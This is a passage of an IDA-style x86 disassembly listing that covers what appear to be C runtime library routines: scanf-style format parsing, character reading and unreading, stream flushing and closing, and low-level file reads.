mov dword ptr [ebp+CharType], ebx
push 78h
jmp short loc_41DEE1
; ---------------------------------------------------------------------------
loc_41DF12: ; CODE XREF: sub_41D9B5+46F�j
cmp [ebp+var_5], 0
jle short loc_41DF1C
mov [ebp+var_16], 1
loc_41DF1C: ; CODE XREF: sub_41D9B5+561�j
mov edi, 4400B8h
loc_41DF21: ; CODE XREF: sub_41D9B5+45C�j
; sub_41D9B5+4CE�j
or [ebp+var_18], 0FFh
loc_41DF25: ; CODE XREF: sub_41D9B5+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_4179E0
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41DF49
cmp byte ptr [edi], 5Dh
jnz short loc_41DF49
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41DF4C
; ---------------------------------------------------------------------------
loc_41DF49: ; CODE XREF: sub_41D9B5+584�j
; sub_41D9B5+589�j
mov dl, [ebp+var_35]
loc_41DF4C: ; CODE XREF: sub_41D9B5+592�j
; sub_41D9B5+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41DFB1
inc edi
cmp al, 2Dh
jnz short loc_41DF98
test dl, dl
jz short loc_41DF98
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41DF98
inc edi
cmp dl, cl
jnb short loc_41DF6B
mov al, cl
jmp short loc_41DF6F
; ---------------------------------------------------------------------------
loc_41DF6B: ; CODE XREF: sub_41D9B5+5B0�j
mov al, dl
mov dl, cl
loc_41DF6F: ; CODE XREF: sub_41D9B5+5B4�j
cmp dl, al
ja short loc_41DF94
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41DF7C: ; CODE XREF: sub_41D9B5+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41DF7C
loc_41DF94: ; CODE XREF: sub_41D9B5+5BC�j
xor dl, dl
jmp short loc_41DF4C
; ---------------------------------------------------------------------------
loc_41DF98: ; CODE XREF: sub_41D9B5+5A0�j
; sub_41D9B5+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41DF4C
; ---------------------------------------------------------------------------
loc_41DFB1: ; CODE XREF: sub_41D9B5+59B�j
cmp byte ptr [edi], 0
jz loc_41E3BB
cmp [ebp+var_3C], 7Bh
jnz short loc_41DFC3
mov [ebp+arg_4], edi
loc_41DFC3: ; CODE XREF: sub_41D9B5+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push dword ptr [ebp+CharType]
mov [ebp+var_30], esi
call sub_41E42B
pop ecx
pop ecx
loc_41DFDA: ; CODE XREF: sub_41D9B5+6BC�j
; sub_41D9B5+6C4�j
cmp [ebp+var_20], 0
jz short loc_41DFEE
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41E08A
loc_41DFEE: ; CODE XREF: sub_41D9B5+629�j
inc [ebp+var_4]
push edi
call sub_41E411
cmp eax, 0FFFFFFFFh
pop ecx
mov dword ptr [ebp+CharType], eax
jz short loc_41E07E
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41E07E
cmp [ebp+var_E], 0
jnz short loc_41E076
cmp [ebp+var_16], 0
jz short loc_41E06B
mov ecx, dword_43DD30
mov [ebp+MultiByteStr], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E04A
inc [ebp+var_4]
push edi
call sub_41E411
pop ecx
mov [ebp+var_37], al
loc_41E04A: ; CODE XREF: sub_41D9B5+686�j
push cbMultiByte ; int
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
call sub_420A8A
mov ax, [ebp+WideCharStr]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41E06E
; ---------------------------------------------------------------------------
loc_41E06B: ; CODE XREF: sub_41D9B5+673�j
mov [esi], al
inc esi
loc_41E06E: ; CODE XREF: sub_41D9B5+6B4�j
mov [ebp+var_2C], esi
jmp loc_41DFDA
; ---------------------------------------------------------------------------
loc_41E076: ; CODE XREF: sub_41D9B5+66D�j
inc [ebp+var_30]
jmp loc_41DFDA
; ---------------------------------------------------------------------------
loc_41E07E: ; CODE XREF: sub_41D9B5+649�j
; sub_41D9B5+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41E42B
pop ecx
pop ecx
loc_41E08A: ; CODE XREF: sub_41D9B5+633�j
cmp [ebp+var_30], esi
jz loc_41E3BB
cmp [ebp+var_E], 0
jnz loc_41E31C
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41E31C
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41E0BC
and word ptr [eax], 0
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41E0BC: ; CODE XREF: sub_41D9B5+6FC�j
and byte ptr [eax], 0
jmp loc_41E31C
; ---------------------------------------------------------------------------
loc_41E0C4: ; CODE XREF: sub_41D9B5+466�j
mov [ebp+var_D], 1
loc_41E0C8: ; CODE XREF: sub_41D9B5+203�j
; sub_41D9B5+215�j ...
mov ebx, dword ptr [ebp+CharType]
cmp ebx, 2Dh
jnz short loc_41E0D6
mov [ebp+var_17], 1
jmp short loc_41E0DB
; ---------------------------------------------------------------------------
loc_41E0D6: ; CODE XREF: sub_41D9B5+719�j
cmp ebx, 2Bh
jnz short loc_41E0FD
loc_41E0DB: ; CODE XREF: sub_41D9B5+71F�j
dec [ebp+var_C]
jnz short loc_41E0EC
cmp [ebp+var_20], 0
jz short loc_41E0EC
mov [ebp+var_F], 1
jmp short loc_41E0FD
; ---------------------------------------------------------------------------
loc_41E0EC: ; CODE XREF: sub_41D9B5+729�j
; sub_41D9B5+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
pop ecx
mov ebx, eax
loc_41E0FA: ; CODE XREF: sub_41D9B5+543�j
mov dword ptr [ebp+CharType], ebx
loc_41E0FD: ; CODE XREF: sub_41D9B5+4FD�j
; sub_41D9B5+52D�j ...
cmp [ebp+var_30], 0
jz loc_41E216
cmp [ebp+var_F], 0
jnz loc_41E1F4
loc_41E111: ; CODE XREF: sub_41D9B5+82C�j
cmp esi, 78h
jnz short loc_41E165
cmp cbMultiByte, 1
jle short loc_41E12E
push 80h ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41E13B
; ---------------------------------------------------------------------------
loc_41E12E: ; CODE XREF: sub_41D9B5+768�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 80h
loc_41E13B: ; CODE XREF: sub_41D9B5+777�j
test eax, eax
jz loc_41E1E6
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_420B80
push ebx ; CharType
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41E3DA
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp short loc_41E1B8
; ---------------------------------------------------------------------------
loc_41E165: ; CODE XREF: sub_41D9B5+75F�j
cmp cbMultiByte, 1
jle short loc_41E17A
push 4 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41E185
; ---------------------------------------------------------------------------
loc_41E17A: ; CODE XREF: sub_41D9B5+7B7�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 4
loc_41E185: ; CODE XREF: sub_41D9B5+7C3�j
test eax, eax
jz short loc_41E1E6
cmp esi, 6Fh
jnz short loc_41E1A3
cmp ebx, 38h
jge short loc_41E1E6
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_420B80
jmp short loc_41E1B2
; ---------------------------------------------------------------------------
loc_41E1A3: ; CODE XREF: sub_41D9B5+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_417E10
loc_41E1B2: ; CODE XREF: sub_41D9B5+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41E1B8: ; CODE XREF: sub_41D9B5+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41E1D0
dec [ebp+var_C]
jz short loc_41E1F4
loc_41E1D0: ; CODE XREF: sub_41D9B5+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp loc_41E111
; ---------------------------------------------------------------------------
loc_41E1E6: ; CODE XREF: sub_41D9B5+788�j
; sub_41D9B5+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E42B
pop ecx
pop ecx
loc_41E1F4: ; CODE XREF: sub_41D9B5+756�j
; sub_41D9B5+819�j
cmp [ebp+var_17], 0
jz loc_41E2DA
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41E2DA
; ---------------------------------------------------------------------------
loc_41E216: ; CODE XREF: sub_41D9B5+74C�j
cmp [ebp+var_F], 0
jnz loc_41E2D2
loc_41E220: ; CODE XREF: sub_41D9B5+90A�j
cmp esi, 78h
jz short loc_41E264
cmp esi, 70h
jz short loc_41E264
cmp cbMultiByte, 1
jle short loc_41E23F
push 4 ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41E24A
; ---------------------------------------------------------------------------
loc_41E23F: ; CODE XREF: sub_41D9B5+87C�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 4
loc_41E24A: ; CODE XREF: sub_41D9B5+888�j
test eax, eax
jz short loc_41E2C4
cmp esi, 6Fh
jnz short loc_41E25D
cmp ebx, 38h
jge short loc_41E2C4
shl edi, 3
jmp short loc_41E29C
; ---------------------------------------------------------------------------
loc_41E25D: ; CODE XREF: sub_41D9B5+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41E29C
; ---------------------------------------------------------------------------
loc_41E264: ; CODE XREF: sub_41D9B5+86E�j
; sub_41D9B5+873�j
cmp cbMultiByte, 1
jle short loc_41E27C
push 80h ; int
push ebx ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41E289
; ---------------------------------------------------------------------------
loc_41E27C: ; CODE XREF: sub_41D9B5+8B6�j
mov eax, dword_43DD30
mov al, [eax+ebx*2]
and eax, 80h
loc_41E289: ; CODE XREF: sub_41D9B5+8C5�j
test eax, eax
jz short loc_41E2C4
push ebx ; CharType
shl edi, 4
call sub_41E3DA
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
loc_41E29C: ; CODE XREF: sub_41D9B5+8A6�j
; sub_41D9B5+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41E2AE
dec [ebp+var_C]
jz short loc_41E2D2
loc_41E2AE: ; CODE XREF: sub_41D9B5+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41E411
mov ebx, eax
pop ecx
mov dword ptr [ebp+CharType], ebx
jmp loc_41E220
; ---------------------------------------------------------------------------
loc_41E2C4: ; CODE XREF: sub_41D9B5+897�j
; sub_41D9B5+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41E42B
pop ecx
pop ecx
loc_41E2D2: ; CODE XREF: sub_41D9B5+865�j
; sub_41D9B5+8F7�j
cmp [ebp+var_17], 0
jz short loc_41E2DA
neg edi
loc_41E2DA: ; CODE XREF: sub_41D9B5+843�j
; sub_41D9B5+85C�j ...
cmp esi, 46h
jnz short loc_41E2E3
and [ebp+var_1C], 0
loc_41E2E3: ; CODE XREF: sub_41D9B5+928�j
cmp [ebp+var_1C], 0
jz loc_41E3BB
cmp [ebp+var_E], 0
jnz short loc_41E31C
inc [ebp+var_34]
loc_41E2F6: ; CODE XREF: sub_41D9B5+23B�j
cmp [ebp+var_30], 0
jz short loc_41E30C
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41E31C
; ---------------------------------------------------------------------------
loc_41E30C: ; CODE XREF: sub_41D9B5+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41E319
mov [eax], edi
jmp short loc_41E31C
; ---------------------------------------------------------------------------
loc_41E319: ; CODE XREF: sub_41D9B5+95E�j
mov [eax], di
loc_41E31C: ; CODE XREF: sub_41D9B5+241�j
; sub_41D9B5+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41E369
; ---------------------------------------------------------------------------
loc_41E327: ; CODE XREF: sub_41D9B5+93�j
inc [ebp+var_4]
push edi
call sub_41E411
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov dword ptr [ebp+CharType], ebx
mov [ebp+arg_4], esi
jnz short loc_41E396
mov ecx, dword_43DD30
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41E369
inc [ebp+var_4]
push edi
call sub_41E411
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41E3A4
dec [ebp+var_4]
loc_41E369: ; CODE XREF: sub_41D9B5+970�j
; sub_41D9B5+99A�j
cmp dword ptr [ebp+CharType], 0FFFFFFFFh
jnz short loc_41E37F
cmp byte ptr [esi], 25h
jnz short loc_41E3C1
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41E3C1
mov esi, eax
loc_41E37F: ; CODE XREF: sub_41D9B5+9B8�j
mov al, [esi]
test al, al
jnz loc_41D9DF
jmp short loc_41E3BB
; ---------------------------------------------------------------------------
loc_41E38B: ; CODE XREF: sub_41D9B5+1F4�j
; sub_41D9B5+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push dword ptr [ebp+CharType]
jmp short loc_41E39B
; ---------------------------------------------------------------------------
loc_41E396: ; CODE XREF: sub_41D9B5+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41E39B: ; CODE XREF: sub_41D9B5+9DF�j
call sub_41E42B
pop ecx
pop ecx
jmp short loc_41E3BB
; ---------------------------------------------------------------------------
loc_41E3A4: ; CODE XREF: sub_41D9B5+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41E42B
dec [ebp+var_4]
push edi
push ebx
call sub_41E42B
add esp, 10h
loc_41E3BB: ; CODE XREF: sub_41D9B5+1F�j
; sub_41D9B5+40A�j ...
cmp dword ptr [ebp+CharType], 0FFFFFFFFh
jnz short loc_41E3D2
loc_41E3C1: ; CODE XREF: sub_41D9B5+9BD�j
; sub_41D9B5+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41E3D5
cmp [ebp+var_15], al
jnz short loc_41E3D5
or eax, 0FFFFFFFFh
jmp short loc_41E3D5
; ---------------------------------------------------------------------------
loc_41E3D2: ; CODE XREF: sub_41D9B5+A0A�j
mov eax, [ebp+var_34]
loc_41E3D5: ; CODE XREF: sub_41D9B5+A11�j
; sub_41D9B5+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D9B5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41E3DA(WORD CharType)
sub_41E3DA proc near ; CODE XREF: sub_41D9B5+7A3�p
; sub_41D9B5+8DC�p
CharType = word ptr 4
cmp cbMultiByte, 1
push esi
jle short loc_41E3F4
mov esi, dword ptr [esp+4+CharType]
push 4 ; int
push esi ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_41E403
; ---------------------------------------------------------------------------
loc_41E3F4: ; CODE XREF: sub_41E3DA+8�j
mov esi, dword ptr [esp+4+CharType]
mov eax, dword_43DD30
mov al, [eax+esi*2]
and eax, 4
loc_41E403: ; CODE XREF: sub_41E3DA+18�j
test eax, eax
jnz short loc_41E40D
and esi, 0FFFFFFDFh
sub esi, 7
loc_41E40D: ; CODE XREF: sub_41E3DA+2B�j
mov eax, esi
pop esi
retn
sub_41E3DA endp
; =============== S U B R O U T I N E =======================================
sub_41E411 proc near ; CODE XREF: sub_41D9B5+1E1�p
; sub_41D9B5+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41E423
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41E423: ; CODE XREF: sub_41E411+7�j
push edx
call sub_41E651
pop ecx
retn
sub_41E411 endp
; =============== S U B R O U T I N E =======================================
sub_41E42B proc near ; CODE XREF: sub_41D9B5+6B�p
; sub_41D9B5+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41E441
push [esp+arg_4]
push [esp+4+arg_0]
call sub_420B9F
pop ecx
pop ecx
locret_41E441: ; CODE XREF: sub_41E42B+5�j
retn
sub_41E42B endp
; =============== S U B R O U T I N E =======================================
sub_41E442 proc near ; CODE XREF: sub_41D9B5+63�p
; sub_41D9B5+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41E448: ; CODE XREF: sub_41E442+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41E411
mov edi, eax
push edi ; CharType
call sub_420B52
pop ecx
test eax, eax
pop ecx
jnz short loc_41E448
mov eax, edi
pop edi
pop esi
retn
sub_41E442 endp
; =============== S U B R O U T I N E =======================================
sub_41E466 proc near ; CODE XREF: sub_418F0B+2A�p
; sub_420E27+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword ptr byte_445EDC+0D5A24h
jnb loc_41E500
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:51B800h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41E500
push edi
call sub_420D93
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E4DF
cmp edi, 1
jz short loc_41E4AD
cmp edi, 2
jnz short loc_41E4C3
loc_41E4AD: ; CODE XREF: sub_41E466+40�j
push 2
call sub_420D93
push 1
mov ebp, eax
call sub_420D93
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41E4DF
loc_41E4C3: ; CODE XREF: sub_41E466+45�j
push edi
call sub_420D93
pop ecx
push eax
call dword ptr byte_424074+4
test eax, eax
jnz short loc_41E4DF
call GetLastError
mov ebp, eax
jmp short loc_41E4E1
; ---------------------------------------------------------------------------
loc_41E4DF: ; CODE XREF: sub_41E466+3B�j
; sub_41E466+5B�j ...
xor ebp, ebp
loc_41E4E1: ; CODE XREF: sub_41E466+77�j
push edi
call sub_420D19
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41E4FC
push ebp
call sub_41F64A
pop ecx
jmp short loc_41E511
; ---------------------------------------------------------------------------
loc_41E4FC: ; CODE XREF: sub_41E466+8B�j
xor eax, eax
jmp short loc_41E514
; ---------------------------------------------------------------------------
loc_41E500: ; CODE XREF: sub_41E466+E�j
; sub_41E466+2F�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
loc_41E511: ; CODE XREF: sub_41E466+94�j
or eax, 0FFFFFFFFh
loc_41E514: ; CODE XREF: sub_41E466+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41E466 endp
; =============== S U B R O U T I N E =======================================
sub_41E519 proc near ; CODE XREF: sub_418F0B+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41E542
test al, 8
jz short loc_41E542
push dword ptr [esi+8] ; lpMem
call sub_418227
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41E542: ; CODE XREF: sub_41E519+A�j
; sub_41E519+E�j
pop esi
retn
sub_41E519 endp
; =============== S U B R O U T I N E =======================================
sub_41E544 proc near ; CODE XREF: sub_41E5E4+2D�p
; sub_41E5E4+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41E556
push esi
call sub_41E5E4
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E556: ; CODE XREF: sub_41E544+7�j
push esi
call sub_41E57F
test eax, eax
pop ecx
jz short loc_41E566
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E566: ; CODE XREF: sub_41E544+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41E57B
push dword ptr [esi+10h]
call sub_420DD0
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E57B: ; CODE XREF: sub_41E544+26�j
xor eax, eax
pop esi
retn
sub_41E544 endp
; =============== S U B R O U T I N E =======================================
sub_41E57F proc near ; CODE XREF: sub_418F0B+1A�p
; sub_4191A1+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41E5CC
test ax, 108h
jz short loc_41E5CC
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41E5CC
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push dword ptr [esi+10h] ; int
call sub_41F033
add esp, 0Ch
cmp eax, edi
jnz short loc_41E5C5
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41E5CC
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41E5CC
; ---------------------------------------------------------------------------
loc_41E5C5: ; CODE XREF: sub_41E57F+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41E5CC: ; CODE XREF: sub_41E57F+14�j
; sub_41E57F+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41E57F endp
; =============== S U B R O U T I N E =======================================
sub_41E5DB proc near ; CODE XREF: .text:0042010B�p
push 1
call sub_41E5E4
pop ecx
retn
sub_41E5DB endp
; =============== S U B R O U T I N E =======================================
sub_41E5E4 proc near ; CODE XREF: sub_41E544+A�p
; sub_41E5DB+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword ptr byte_445EDC+0D56E4h, esi
jle short loc_41E642
loc_41E5F5: ; CODE XREF: sub_41E5E4+5C�j
mov eax, dword ptr byte_445EDC+0D46DCh
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41E639
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41E639
cmp [esp+0Ch+arg_0], 1
jnz short loc_41E61F
push eax
call sub_41E544
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E639
inc ebx
jmp short loc_41E639
; ---------------------------------------------------------------------------
loc_41E61F: ; CODE XREF: sub_41E5E4+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41E639
test cl, 2
jz short loc_41E639
push eax
call sub_41E544
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41E639
or edi, eax
loc_41E639: ; CODE XREF: sub_41E5E4+1B�j
; sub_41E5E4+23�j ...
inc esi
cmp esi, dword ptr byte_445EDC+0D56E4h
jl short loc_41E5F5
loc_41E642: ; CODE XREF: sub_41E5E4+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41E64D
mov eax, edi
loc_41E64D: ; CODE XREF: sub_41E5E4+65�j
pop edi
pop esi
pop ebx
retn
sub_41E5E4 endp
; =============== S U B R O U T I N E =======================================
sub_41E651 proc near ; CODE XREF: sub_418F61+A9�p
; sub_41974C+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41E725
test al, 40h
jnz loc_41E725
test al, 2
jz short loc_41E677
or al, 20h
mov [esi+0Ch], eax
jmp loc_41E725
; ---------------------------------------------------------------------------
loc_41E677: ; CODE XREF: sub_41E651+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41E68B
push esi
call sub_41FFFC
pop ecx
jmp short loc_41E690
; ---------------------------------------------------------------------------
loc_41E68B: ; CODE XREF: sub_41E651+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41E690: ; CODE XREF: sub_41E651+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41E72A
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41E714
cmp eax, 0FFFFFFFFh
jz short loc_41E714
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41E6E9
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41E6D2
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword ptr byte_445EDC+0D5924h[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41E6D7
; ---------------------------------------------------------------------------
loc_41E6D2: ; CODE XREF: sub_41E651+6B�j
mov edi, 4400C8h
loc_41E6D7: ; CODE XREF: sub_41E651+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41E6E9
or dh, 20h
mov [esi+0Ch], edx
loc_41E6E9: ; CODE XREF: sub_41E651+62�j
; sub_41E651+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41E706
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41E706
test ch, 4
jnz short loc_41E706
mov dword ptr [esi+18h], 1000h
loc_41E706: ; CODE XREF: sub_41E651+9F�j
; sub_41E651+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E714: ; CODE XREF: sub_41E651+55�j
; sub_41E651+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41E725: ; CODE XREF: sub_41E651+A�j
; sub_41E651+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41E651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E72A proc near ; CODE XREF: sub_418F61+90�p
; sub_41E651+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, dword ptr byte_445EDC+0D5A24h
jnb loc_41E907
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:51B800h[eax*4]
mov eax, dword ptr byte_445EDC+0D5924h[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41E907
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41E7DF
test dl, 2
jnz short loc_41E7DF
test dl, 48h
jz short loc_41E79F
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41E79F
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41E79F: ; CODE XREF: sub_41E72A+56�j
; sub_41E72A+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call dword ptr byte_424074
test eax, eax
jnz short loc_41E7F2
call GetLastError
push 5
pop ecx
cmp eax, ecx
jnz short loc_41E7DA
mov dword ptr byte_445EDC+0D43E4h, 9
mov dword ptr byte_445EDC+0D43E8h, ecx
jmp loc_41E918
; ---------------------------------------------------------------------------
loc_41E7DA: ; CODE XREF: sub_41E72A+99�j
cmp eax, 6Dh
jnz short loc_41E7E6
loc_41E7DF: ; CODE XREF: sub_41E72A+4C�j
; sub_41E72A+51�j
xor eax, eax
jmp loc_41E91B
; ---------------------------------------------------------------------------
loc_41E7E6: ; CODE XREF: sub_41E72A+B3�j
push eax
call sub_41F64A
pop ecx
jmp loc_41E918
; ---------------------------------------------------------------------------
loc_41E7F2: ; CODE XREF: sub_41E72A+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41E902
test edx, edx
jz short loc_41E817
cmp byte ptr [edi], 0Ah
jnz short loc_41E817
or al, 4
jmp short loc_41E819
; ---------------------------------------------------------------------------
loc_41E817: ; CODE XREF: sub_41E72A+E2�j
; sub_41E72A+E7�j
and al, 0FBh
loc_41E819: ; CODE XREF: sub_41E72A+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41E8FC
